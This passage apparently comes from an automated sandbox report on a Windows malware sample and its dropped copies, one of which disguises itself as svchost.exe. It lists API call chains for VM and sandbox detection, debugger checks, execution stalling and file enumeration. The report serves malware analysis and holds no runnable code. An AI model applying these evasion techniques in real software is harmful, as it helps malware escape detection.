Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	10_2_0153FFE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	10_2_01521670

Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date		0_2_00403900
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date		2_2_00403900

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess

graph_0-29898

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_0-29930
Source: C:\Windows\apppatch\svchost.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_2-81093

Found stalling execution ending in API Sleep call

Source: C:\Windows\apppatch\svchost.exe

Stalling execution: Execution stalls by calling Sleep

graph_2-80949

Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\apppatch\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	File opened / queried: C:\Windows\system\vmhgfs.DLL	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	File opened / queried: C:\Users\user\Desktop\vmhgfs.DLL	Jump to behavior

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00401A30 rdtsc

0_2_00401A30

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,

2_2_02C76A30

Source: C:\Windows\apppatch\svchost.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 2214	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 1219	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 1206	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 3536	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C864A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	2_2_02C864A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	6_2_017564A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031164A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	7_2_031164A0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015364A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	10_2_015364A0

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	API coverage: 2.9 %
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	API coverage: 2.1 %
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	API coverage: 2.1 %

Source: C:\Windows\apppatch\svchost.exe TID: 6256	Thread sleep count: 2214 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 6256	Thread sleep time: -221400s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7404	Thread sleep count: 1219 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7404	Thread sleep time: -121900s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7408	Thread sleep count: 1206 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7408	Thread sleep time: -120600s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 6256	Thread sleep count: 3536 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 6256	Thread sleep time: -353600s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 7076	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	2_2_02C97CE0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,	2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	2_2_02C9BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175D189
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175D0C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175BB20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0175BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	6_2_0175BBE9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_01767CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	6_2_01767CE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_0176BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	6_2_0176BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_017466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	6_2_017466D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311BB20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311BBE9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311D189
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0311D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	7_2_0311D0C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_0312BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	7_2_0312BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_031066D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	7_2_031066D0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_03127CE0 LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	7_2_03127CE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153D189
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153D0C0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153BB20
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0153BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,	10_2_0153BBE9
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_01547CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	10_2_01547CE0
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_0154BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	10_2_0154BE40
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_015266D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	10_2_015266D0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,

2_2_02C9C3DB

Source: C:\Windows\apppatch\svchost.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: svchost.exe, 00000002.00000003.2434703123.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2378939209.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330154891.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365586008.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3302424542.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3267140420.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558551911.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2785163841.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610102916.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2646474973.0000000000883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMSAFD RfComm [Bluetooth]
Source: svchost.exe, 00000002.00000003.2334859023.0000000000882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMSAFD RfComm [Bluetooth]g
Source: svchost.exe, 00000002.00000002.3383391050.0000000000826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hwindows\apppatch\vmhgfs.DLL
Source: svchost.exe, 00000002.00000003.2323585198.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384269083.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296191981.0000000000883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMSAFD RfComm [Bluetooth]>
Source: svchost.exe, 00000002.00000002.3384985435.0000000000848000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000016.00000002.2606731229.0000000000658000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000C48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000002.00000002.3383391050.0000000000826000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: NcYLgtXIKJgHj.exe, 0000001F.00000002.2695589851.0000000000C48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: NcYLgtXIKJgHj.exe, 00000006.00000002.2554600445.00000000015E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_
Source: NcYLgtXIKJgHj.exe, 0000000A.00000002.2578890120.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 0000000E.00000002.2553613920.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, NcYLgtXIKJgHj.exe, 00000024.00000002.2644543584.0000000000706000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\apppatch\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
